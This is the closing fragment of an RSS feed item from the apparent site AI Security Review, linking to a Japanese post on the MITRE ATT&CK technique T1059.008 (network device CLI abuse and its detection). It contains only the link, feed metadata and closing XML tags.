<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/">T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
